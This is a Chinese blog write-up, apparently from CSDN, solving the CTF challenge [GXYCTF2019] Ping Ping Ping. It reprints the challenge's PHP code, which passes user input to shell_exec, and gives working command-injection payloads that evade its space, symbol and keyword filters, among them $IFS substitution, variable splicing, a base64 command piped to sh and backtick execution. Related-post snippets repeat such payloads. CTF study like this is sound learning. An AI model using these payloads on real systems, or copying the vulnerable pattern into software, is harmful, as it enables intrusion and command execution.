web-[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-10-29 09:44:29 发布
最新推荐文章于 2024-10-29 09:44:29 发布
阅读量738 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wojiushilsy/article/details/106126800
版权

题目要点

  • linux常见绕过方法
    $IFS$9(空格)

  • 命令执行变量拼接
    /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

  • 过滤bash用sh执行
    echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

  • 内联执行
    将反引号内命令的输出作为输入执行

题目内容

在这里插入图片描述

解题

打开链接,提示 /?ip在url输入参数
先随便输入在这里插入图片描述
应该是Linux命令。尝试拼接命令。
在这里插入图片描述

http://2b6f3e94-035c-4feb-b2c5-d92d4eb7b42b.node3.buuoj.cn/?ip=127.0.0.1;cat%20index.php
返回结果:
/?ip= fxck your space!

过滤了空格。($IFS$9 绕过)

http://2b6f3e94-035c-4feb-b2c5-d92d4eb7b42b.node3.buuoj.cn/?ip=127.0.0.1;cat$IFS$9index.php
返回结果:
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}
?>
方法一:命令执行变量拼接
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
方法二:过滤bash用sh执行
/?ip=127.0.0.1;echo$IFS\$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
方法三:内联执行(将反引号内命令的输出作为输入执行)
/?ip=127.0.0.1;cat$IFS$9`ls`
BUUOJ-Web-刷题记录
x0r
09-01 443
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
LJW123487的博客
07-25 879
本题涉及知识点:命令执行漏洞,过滤绕过
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8302
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
[GXYCTF2019]Ping Ping Ping
weixin_52268949的博客
02-07 2361
[GXYCTF2019]Ping Ping Ping 进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令 发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了 ?ip=127.0.0.1;cat$IFS$9index.php 源码如下 /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo pr
[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配,空格过滤)
2301_79326813的博客
01-31 1573
先看网页按照正常流程,先ip+ls,可以看到flag但是不能直接得flag,他应该是过滤掉了一点东西。这里考虑过滤掉了空格。
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 695
本题主要阴间在绕过字符和变量的运用细节上。
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5458
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1337
BUUctf [GXYCTF2019]Ping Ping Ping
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 720
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
[GXYCTF2019]Ping Ping Ping 1
最新发布
01-09
针对 GXYCTF2019 中名为 'Ping Ping Ping' 的挑战题,该题目属于网络安全竞赛中的网络层攻击与防御类别。虽然提供的参考资料主要讨论了连续提示上的后门攻击[^1],这与具体 CTF 题目不完全匹配,但可以借鉴其中关于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值